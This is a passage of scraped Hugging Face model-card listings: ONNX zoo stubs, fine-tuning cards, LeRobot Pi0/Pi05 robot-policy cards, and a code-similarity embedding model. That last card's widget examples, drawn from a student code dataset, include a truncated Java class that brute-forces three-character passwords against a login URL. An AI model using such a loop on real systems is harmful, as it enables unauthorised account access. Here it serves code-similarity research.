howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
onnxmodelzoo/resnetv2_50d_evos_Opset17
|
onnxmodelzoo
| 2025-09-23T14:39:19Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:11Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_evos_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50_Opset16
|
onnxmodelzoo
| 2025-09-23T14:38:45Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:38:37Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50_Opset16.onnx
tags:
- Computer_Vision
---
|
Emil7018/classifier-chapter4
|
Emil7018
| 2025-09-23T14:36:54Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:google-bert/bert-base-uncased",
"base_model:finetune:google-bert/bert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-22T16:35:54Z |
---
library_name: transformers
license: apache-2.0
base_model: bert-base-uncased
tags:
- generated_from_trainer
model-index:
- name: classifier-chapter4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# classifier-chapter4
This model is a fine-tuned version of [bert-base-uncased](https://huggingface.co/bert-base-uncased) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2
### Framework versions
- Transformers 4.56.2
- Pytorch 2.8.0+cu126
- Datasets 4.0.0
- Tokenizers 0.22.0
|
pepijn223/pi05_libero
|
pepijn223
| 2025-09-23T14:36:23Z | 64 | 1 | null |
[
"safetensors",
"region:us"
] | null | 2025-09-09T15:23:56Z |
# π₀.₅ (Pi05) Libero
π₀.₅ is a **Vision-Language-Action model with open-world generalization**, from Physical Intelligence. The LeRobot implementation is adapted from their open source [OpenPI](https://github.com/Physical-Intelligence/openpi) repository.
## Model Overview
π₀.₅ represents a significant evolution from π₀, developed by [Physical Intelligence](https://www.physicalintelligence.company/blog/pi05) to address a big challenge in robotics: **open-world generalization**. While robots can perform impressive tasks in controlled environments, π₀.₅ is designed to generalize to entirely new environments and situations that were never seen during training.
### The Generalization Challenge
As Physical Intelligence explains, the fundamental challenge isn't performing tasks of agility or dexterity, but generalization, the ability to correctly perform tasks in new settings with new objects. Consider a robot cleaning different homes: each home has different objects in different places. Generalization must occur at multiple levels:
- **Physical Level**: Understanding how to pick up a spoon (by the handle) or plate (by the edge), even with unseen objects in cluttered environments
- **Semantic Level**: Understanding task semantics, where to put clothes and shoes (laundry hamper, not on the bed), and what tools are appropriate for cleaning spills
- **Environmental Level**: Adapting to "messy" real-world environments like homes, grocery stores, offices, and hospitals
### Co-Training on Heterogeneous Data
The breakthrough innovation in π₀.₅ is **co-training on heterogeneous data sources**. The model learns from:
1. **Multimodal Web Data**: Image captioning, visual question answering, object detection
2. **Verbal Instructions**: Humans coaching robots through complex tasks step-by-step
3. **Subtask Commands**: High-level semantic behavior labels (e.g., "pick up the pillow" for an unmade bed)
4. **Cross-Embodiment Robot Data**: Data from various robot platforms with different capabilities
5. **Multi-Environment Data**: Static robots deployed across many different homes
6. **Mobile Manipulation Data**: ~400 hours of mobile robot demonstrations
This diverse training mixture creates a "curriculum" that enables generalization across physical, visual, and semantic levels simultaneously.
## Training
Here's a complete training command for finetuning the base π₀.₅ model on your own dataset:
```bash
python src/lerobot/scripts/train.py \
--dataset.repo_id=your_dataset \
--policy.type=pi05 \
--output_dir=./outputs/pi05_training \
--job_name=pi05_training \
--policy.repo_id=pepijn223/pi05_libero \
--policy.pretrained_path=your_repo_id \
--policy.compile_model=true \
--policy.gradient_checkpointing=true \
--wandb.enable=true \
--policy.dtype=bfloat16 \
--steps=3000 \
--policy.scheduler_decay_steps=3000 \
--policy.device=cuda \
--batch_size=32
```
## Conversion Details
This model was converted from JAX to PyTorch using the OpenPI conversion script:
```bash
python examples/convert_jax_model_to_pytorch.py \
--checkpoint_dir /pi05_libero \
--config_name pi05_libero \
--output_path /pi05_base/pytorch/fp32/ \
--precision float32
```
## Citation
If you use this model, please cite the original OpenPI work:
```bibtex
@article{openpi2024,
title={Open-World Robotic Manipulation with Vision-Language-Action Models},
author={Physical Intelligence},
year={2024},
url={https://github.com/Physical-Intelligence/openpi}
}
```
## Original Repository
[OpenPI GitHub Repository](https://github.com/Physical-Intelligence/openpi)
## License
This model follows the same license as the original OpenPI repository.
|
pepijn223/pi0_libero
|
pepijn223
| 2025-09-23T14:35:48Z | 117 | 1 | null |
[
"safetensors",
"region:us"
] | null | 2025-09-09T15:22:46Z |
# π₀ (Pi0) Libero
π₀ is a **Vision-Language-Action model for general robot control**, from Physical Intelligence. The LeRobot implementation is adapted from their open source [OpenPI](https://github.com/Physical-Intelligence/openpi) repository.
## Model Overview
π₀ represents a breakthrough in robotics as the first general-purpose robot foundation model developed by [Physical Intelligence](https://www.physicalintelligence.company/blog/pi0). Unlike traditional robots that are narrow specialists programmed for repetitive motions, π₀ is designed to be a generalist policy that can understand visual inputs, interpret natural language instructions, and control a variety of different robots across diverse tasks.
### The Vision for Physical Intelligence
As described by Physical Intelligence, while AI has achieved remarkable success in digital domains, from chess-playing to drug discovery, human intelligence still dramatically outpaces AI in the physical world. To paraphrase Moravec's paradox, winning a game of chess represents an "easy" problem for AI, but folding a shirt or cleaning up a table requires solving some of the most difficult engineering problems ever conceived. π₀ represents a first step toward developing artificial physical intelligence that enables users to simply ask robots to perform any task they want, just like they can with large language models.
### Architecture and Approach
π₀ combines several key innovations:
- **Flow Matching**: Uses a novel method to augment pre-trained VLMs with continuous action outputs via flow matching (a variant of diffusion models)
- **Cross-Embodiment Training**: Trained on data from 8 distinct robot platforms including UR5e, Bimanual UR5e, Franka, Bimanual Trossen, Bimanual ARX, Mobile Trossen, and Mobile Fibocom
- **Internet-Scale Pre-training**: Inherits semantic knowledge from a pre-trained 3B parameter Vision-Language Model
- **High-Frequency Control**: Outputs motor commands at up to 50 Hz for real-time dexterous manipulation
## Training
For training π₀, you can use the standard LeRobot training script with the appropriate configuration:
```bash
python src/lerobot/scripts/train.py \
--dataset.repo_id=your_dataset \
--policy.type=pi0 \
--output_dir=./outputs/pi0_training \
--job_name=pi0_training \
--policy.pretrained_path=pepijn223/pi0_libero \
--policy.repo_id=your_repo_id \
--policy.compile_model=true \
--policy.gradient_checkpointing=true \
--policy.dtype=bfloat16 \
--steps=3000 \
--policy.scheduler_decay_steps=3000 \
--policy.device=cuda \
--batch_size=32
```
## Conversion Details
This model was converted from JAX to PyTorch using the OpenPI conversion script:
```bash
python examples/convert_jax_model_to_pytorch.py \
--checkpoint_dir /pi0_libero \
--config_name pi0_libero \
--output_path /pi0_base/pytorch/fp32/ \
--precision float32
```
## Citation
If you use this model, please cite the original OpenPI work:
```bibtex
@article{openpi2024,
title={Open-World Robotic Manipulation with Vision-Language-Action Models},
author={Physical Intelligence},
year={2024},
url={https://github.com/Physical-Intelligence/openpi}
}
```
## Original Repository
[OpenPI GitHub Repository](https://github.com/Physical-Intelligence/openpi)
## License
This model follows the same license as the original OpenPI repository.
|
onnxmodelzoo/resnetv2_152x2_bit_teacher_Opset17
|
onnxmodelzoo
| 2025-09-23T14:35:25Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:33:38Z |
---
language: en
license: apache-2.0
model_name: resnetv2_152x2_bit_teacher_Opset17.onnx
tags:
- Computer_Vision
---
|
alexiaassis/Modelo-treinado
|
alexiaassis
| 2025-09-23T14:35:22Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"llama-factory",
"lora",
"unsloth",
"generated_from_trainer",
"base_model:unsloth/mistral-7b-instruct-v0.3-bnb-4bit",
"base_model:adapter:unsloth/mistral-7b-instruct-v0.3-bnb-4bit",
"license:other",
"region:us"
] | null | 2025-09-23T14:15:54Z |
---
library_name: peft
license: other
base_model: unsloth/mistral-7b-instruct-v0.3-bnb-4bit
tags:
- llama-factory
- lora
- unsloth
- generated_from_trainer
model-index:
- name: mistral-treinado
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mistral-treinado
This model is a fine-tuned version of [mistralai/Mistral-7B-Instruct-v0.3](https://huggingface.co/mistralai/Mistral-7B-Instruct-v0.3) on the treino_pt_rde dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 3e-05
- train_batch_size: 4
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 2
- total_train_batch_size: 8
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: cosine
- num_epochs: 3.0
- mixed_precision_training: Native AMP
### Training results
### Framework versions
- PEFT 0.15.2
- Transformers 4.52.4
- Pytorch 2.8.0+cu126
- Datasets 3.6.0
- Tokenizers 0.21.1
|
chocolat-nya/record_tag_test
|
chocolat-nya
| 2025-09-23T14:33:36Z | 0 | 0 |
lerobot
|
[
"lerobot",
"safetensors",
"act",
"robotics",
"dataset:chocolat-nya/record_tag_test",
"arxiv:2304.13705",
"license:apache-2.0",
"region:us"
] |
robotics
| 2025-09-23T08:58:37Z |
---
datasets: chocolat-nya/record_tag_test
library_name: lerobot
license: apache-2.0
model_name: act
pipeline_tag: robotics
tags:
- act
- robotics
- lerobot
---
# Model Card for act
<!-- Provide a quick summary of what the model is/does. -->
[Action Chunking with Transformers (ACT)](https://huggingface.co/papers/2304.13705) is an imitation-learning method that predicts short action chunks instead of single steps. It learns from teleoperated data and often achieves high success rates.
This policy has been trained and pushed to the Hub using [LeRobot](https://github.com/huggingface/lerobot).
See the full documentation at [LeRobot Docs](https://huggingface.co/docs/lerobot/index).
---
## How to Get Started with the Model
For a complete walkthrough, see the [training guide](https://huggingface.co/docs/lerobot/il_robots#train-a-policy).
Below is the short version on how to train and run inference/eval:
### Train from scratch
```bash
lerobot-train \
--dataset.repo_id=${HF_USER}/<dataset> \
--policy.type=act \
--output_dir=outputs/train/<desired_policy_repo_id> \
--job_name=lerobot_training \
--policy.device=cuda \
--policy.repo_id=${HF_USER}/<desired_policy_repo_id>
--wandb.enable=true
```
_Writes checkpoints to `outputs/train/<desired_policy_repo_id>/checkpoints/`._
### Evaluate the policy/run inference
```bash
lerobot-record \
--robot.type=so100_follower \
--dataset.repo_id=<hf_user>/eval_<dataset> \
--policy.path=<hf_user>/<desired_policy_repo_id> \
--episodes=10
```
Prefix the dataset repo with **eval\_** and supply `--policy.path` pointing to a local or hub checkpoint.
---
## Model Details
- **License:** apache-2.0
|
fpadovani/cds_shuffle_np_51
|
fpadovani
| 2025-09-23T14:33:18Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gpt2",
"text-generation",
"generated_from_trainer",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T14:04:25Z |
---
library_name: transformers
tags:
- generated_from_trainer
model-index:
- name: cds_shuffle_np_51
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# cds_shuffle_np_51
This model is a fine-tuned version of [](https://huggingface.co/) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 3.4633
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 256
- eval_batch_size: 256
- seed: 51
- optimizer: Use adamw_torch_fused with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 200
- num_epochs: 5
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| No log | 1.0 | 485 | 3.8830 |
| 4.4798 | 2.0 | 970 | 3.6370 |
| 3.4274 | 3.0 | 1455 | 3.5357 |
| 3.2156 | 4.0 | 1940 | 3.4836 |
| 3.0992 | 5.0 | 2425 | 3.4633 |
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu128
- Datasets 4.0.0
- Tokenizers 0.22.0
|
keemeng/Foundation_GPT_korean
|
keemeng
| 2025-09-23T14:32:37Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"sft",
"unsloth",
"trl",
"base_model:unsloth/gpt-oss-20b-unsloth-bnb-4bit",
"base_model:finetune:unsloth/gpt-oss-20b-unsloth-bnb-4bit",
"endpoints_compatible",
"region:us"
] | null | 2025-09-15T07:05:17Z |
---
base_model: unsloth/gpt-oss-20b-unsloth-bnb-4bit
library_name: transformers
model_name: Foundation_GPT_korean
tags:
- generated_from_trainer
- sft
- unsloth
- trl
licence: license
---
# Model Card for Foundation_GPT_korean
This model is a fine-tuned version of [unsloth/gpt-oss-20b-unsloth-bnb-4bit](https://huggingface.co/unsloth/gpt-oss-20b-unsloth-bnb-4bit).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="keemeng/Foundation_GPT_korean", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 3.6.0
- Tokenizers: 0.22.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64-0922195506-epoch-8
|
vectorzhou
| 2025-09-23T14:32:28Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T13:21:40Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64-0922195506-epoch-8", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/2zoaj66c)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
onnxmodelzoo/resnetv2_152x2_bit_teacher_384_Opset17
|
onnxmodelzoo
| 2025-09-23T14:32:07Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:30:26Z |
---
language: en
license: apache-2.0
model_name: resnetv2_152x2_bit_teacher_384_Opset17.onnx
tags:
- Computer_Vision
---
|
pepijn223/pi0_base
|
pepijn223
| 2025-09-23T14:31:25Z | 147 | 1 | null |
[
"safetensors",
"region:us"
] | null | 2025-09-09T14:54:28Z |
# π₀ (Pi0)
π₀ is a **Vision-Language-Action model for general robot control**, from Physical Intelligence. The LeRobot implementation is adapted from their open source [OpenPI](https://github.com/Physical-Intelligence/openpi) repository.
## Model Overview
π₀ represents a breakthrough in robotics as the first general-purpose robot foundation model developed by [Physical Intelligence](https://www.physicalintelligence.company/blog/pi0). Unlike traditional robots that are narrow specialists programmed for repetitive motions, π₀ is designed to be a generalist policy that can understand visual inputs, interpret natural language instructions, and control a variety of different robots across diverse tasks.
### The Vision for Physical Intelligence
As described by Physical Intelligence, while AI has achieved remarkable success in digital domains, from chess-playing to drug discovery, human intelligence still dramatically outpaces AI in the physical world. To paraphrase Moravec's paradox, winning a game of chess represents an "easy" problem for AI, but folding a shirt or cleaning up a table requires solving some of the most difficult engineering problems ever conceived. π₀ represents a first step toward developing artificial physical intelligence that enables users to simply ask robots to perform any task they want, just like they can with large language models.
### Architecture and Approach
π₀ combines several key innovations:
- **Flow Matching**: Uses a novel method to augment pre-trained VLMs with continuous action outputs via flow matching (a variant of diffusion models)
- **Cross-Embodiment Training**: Trained on data from 8 distinct robot platforms including UR5e, Bimanual UR5e, Franka, Bimanual Trossen, Bimanual ARX, Mobile Trossen, and Mobile Fibocom
- **Internet-Scale Pre-training**: Inherits semantic knowledge from a pre-trained 3B parameter Vision-Language Model
- **High-Frequency Control**: Outputs motor commands at up to 50 Hz for real-time dexterous manipulation
## Training
For training π₀, you can use the standard LeRobot training script with the appropriate configuration:
```bash
python src/lerobot/scripts/train.py \
--dataset.repo_id=your_dataset \
--policy.type=pi0 \
--output_dir=./outputs/pi0_training \
--job_name=pi0_training \
--policy.pretrained_path=pepijn223/pi0_base \
--policy.repo_id=your_repo_id \
--policy.compile_model=true \
--policy.gradient_checkpointing=true \
--policy.dtype=bfloat16 \
--steps=3000 \
--policy.scheduler_decay_steps=3000 \
--policy.device=cuda \
--batch_size=32
```
## Conversion Details
This model was converted from JAX to PyTorch using the OpenPI conversion script:
```bash
python examples/convert_jax_model_to_pytorch.py \
--checkpoint_dir /pi0_base \
--config_name pi0_base \
--output_path /pi0_base/pytorch/fp32/ \
--precision float32
```
## Citation
If you use this model, please cite the original OpenPI work:
```bibtex
@article{openpi2024,
title={Open-World Robotic Manipulation with Vision-Language-Action Models},
author={Physical Intelligence},
year={2024},
url={https://github.com/Physical-Intelligence/openpi}
}
```
## Original Repository
[OpenPI GitHub Repository](https://github.com/Physical-Intelligence/openpi)
## License
This model follows the same license as the original OpenPI repository.
|
onnxmodelzoo/resnetv2_152x2_bit_teacher_384_Opset16
|
onnxmodelzoo
| 2025-09-23T14:30:26Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:28:53Z |
---
language: en
license: apache-2.0
model_name: resnetv2_152x2_bit_teacher_384_Opset16.onnx
tags:
- Computer_Vision
---
|
Obrempong77/gpt-oss-skinhair-finetuned-v1
|
Obrempong77
| 2025-09-23T14:29:48Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"gpt_oss",
"trl",
"en",
"base_model:unsloth/gpt-oss-20b-unsloth-bnb-4bit",
"base_model:finetune:unsloth/gpt-oss-20b-unsloth-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T13:51:13Z |
---
base_model: unsloth/gpt-oss-20b-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- gpt_oss
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Isaac Asante Asare(Obrempong77)
- **License:** apache-2.0
- **Finetuned from model :** unsloth/gpt-oss-20b-unsloth-bnb-4bit
This gpt_oss model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
|
starriver030515/Qwen2.5-Math-1.5B-16k
|
starriver030515
| 2025-09-23T14:29:08Z | 10 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"conversational",
"arxiv:2509.16591",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-17T07:10:05Z |
---
license: mit
library_name: transformers
pipeline_tag: text-generation
---
The base Qwen2.5-Math-1.5B model used by HAPO.
We change to rope_theta from 10000 to 40000 and extend the context window to 16k.
Also, we modify the chat_template for the system prompt and add <think>.
# Citation
If you find our model, data, or evaluation code useful, please kindly cite our paper:
```bib
@misc{liu2025uniformheterogeneoustailoringpolicy,
title={From Uniform to Heterogeneous: Tailoring Policy Optimization to Every Token's Nature},
author={Zheng Liu and Mengjie Liu and Siwei Wen and Mengzhang Cai and Bin Cui and Conghui He and Wentao Zhang},
year={2025},
eprint={2509.16591},
archivePrefix={arXiv},
primaryClass={cs.CL},
url={https://arxiv.org/abs/2509.16591},
}
```
|
yaoyaozuru/blockassist
|
yaoyaozuru
| 2025-09-23T14:29:07Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"waddling stealthy koala",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-23T14:28:03Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- waddling stealthy koala
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
onnxmodelzoo/resnetv2_101x1_bitm_Opset17
|
onnxmodelzoo
| 2025-09-23T14:28:52Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:28:35Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101x1_bitm_Opset16
|
onnxmodelzoo
| 2025-09-23T14:28:34Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:28:13Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101x1_bitm_in21k_Opset17
|
onnxmodelzoo
| 2025-09-23T14:28:12Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:27:47Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_in21k_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101_Opset17
|
onnxmodelzoo
| 2025-09-23T14:27:07Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:26:56Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101_Opset16
|
onnxmodelzoo
| 2025-09-23T14:26:55Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:26:42Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101_Opset16.onnx
tags:
- Computer_Vision
---
|
ASLP-lab/WSChuan-TTS
|
ASLP-lab
| 2025-09-23T14:26:32Z | 0 | 1 | null |
[
"onnx",
"safetensors",
"license:apache-2.0",
"region:us"
] | null | 2025-09-05T13:13:52Z |
---
license: apache-2.0
---
|
onnxmodelzoo/resnetrs420_Opset17
|
onnxmodelzoo
| 2025-09-23T14:26:21Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:25:45Z |
---
language: en
license: apache-2.0
model_name: resnetrs420_Opset17.onnx
tags:
- Computer_Vision
---
|
buelfhood/SOCO-Java-CODEBERTA-MNRL-TRIPLETS-E1-B16
|
buelfhood
| 2025-09-23T14:25:20Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"roberta",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:38664",
"loss:MultipleNegativesRankingLoss",
"dataset:buelfhood/SOCO_TRAIN_java",
"arxiv:1908.10084",
"arxiv:1705.00652",
"base_model:huggingface/CodeBERTa-small-v1",
"base_model:finetune:huggingface/CodeBERTa-small-v1",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T14:25:03Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:38664
- loss:MultipleNegativesRankingLoss
base_model: huggingface/CodeBERTa-small-v1
widget:
- source_sentence: "\n\nimport java.net.*;\nimport java.io.*;\n\npublic class sendMail\
\ {\n\npublic void sendMail(String mailServer, String recipient, String result)\
\ {\n try {\n Socket s = new Socket(mailServer, 25);\n BufferedReader\
\ in = new BufferedReader\n (new InputStreamReader(s.getInputStream(),\
\ \"8859_1\"));\n BufferedWriter out = new BufferedWriter\n (new\
\ OutputStreamWriter(s.getOutputStream(), \"8859_1\"));\n\n send(in, out,\
\ \"HELO client\");\n\n send(in, out, \"MAIL FROM: <WatchDog@SecureECommerce.>\"\
);\n send(in, out, \"RCPT : \" + recipient);\n send(in, out, \"DATA\"\
);\n send(out, \"Subject: \");\n send(out, \"From: Admin <WatchDog@SecureECommerce.>\"\
);\n send (out, \"\\n\");\n \n send(out, result);\n send(out,\
\ \"\\n.\\n\");\n send(in, out, \"QUIT\");\n\n }\n catch (Exception\
\ e) {\n e.printStackTrace();\n }\n }\n\n public void send(BufferedReader\
\ in, BufferedWriter out, String s) {\n try {\n out.write(s + \"\\n\");\n\
\ out.flush();\n System.out.println(s);\n s = in.readLine();\n\
\ System.out.println(s);\n }\n catch (Exception e) {\n e.printStackTrace();\n\
\ }\n }\n\n public void send(BufferedWriter out, String s) {\n try {\n\
\ out.write(s + \"\\n\");\n out.flush();\n System.out.println(s);\n\
\ }\n catch (Exception e) {\n e.printStackTrace();\n }\n }\n\
}"
sentences:
- "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class BruteForce\
\ {\n\n URLConnection conn = null;\n private static boolean status = false;\n\
\n public static void main (String args[]){\n BruteForce a = new BruteForce();\n\
\ String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\",\n \
\ \t\t\t\t \"\",\n \t\t\t\t \"\"};\n int attempts = 0;\n exit:\n\
\ for (int i=0;i<pwdArray.length;i++) {\n\t\t for (int j=0;j<pwdArray.length;j++)\
\ {\n\t\t\t for (int k=0;k<pwdArray.length;k++) {\n\t\t\t\t if (pwdArray[i] ==\
\ ' ' && pwdArray[j] != ' ') continue;\n\t\t\t\t if (pwdArray[j] == ' ' && pwdArray[k]\
\ != ' ') continue;\n\t\t\t\t inp[2] = inp[2] + pwdArray[i] + pwdArray[j] + pwdArray[k];\n\
\t\t\t\t attempts++;\n \t\t\t a.doit(inp);\n \n \t\t\t\t if (status) {\n\
\t\t\t\t\t System.out.println(\"Crrect password is: \" + inp[2]);\n\t\t\t\t\t\
\ System.out.println(\"Number of attempts = \" + attempts);\n\t\t\t\t\t break\
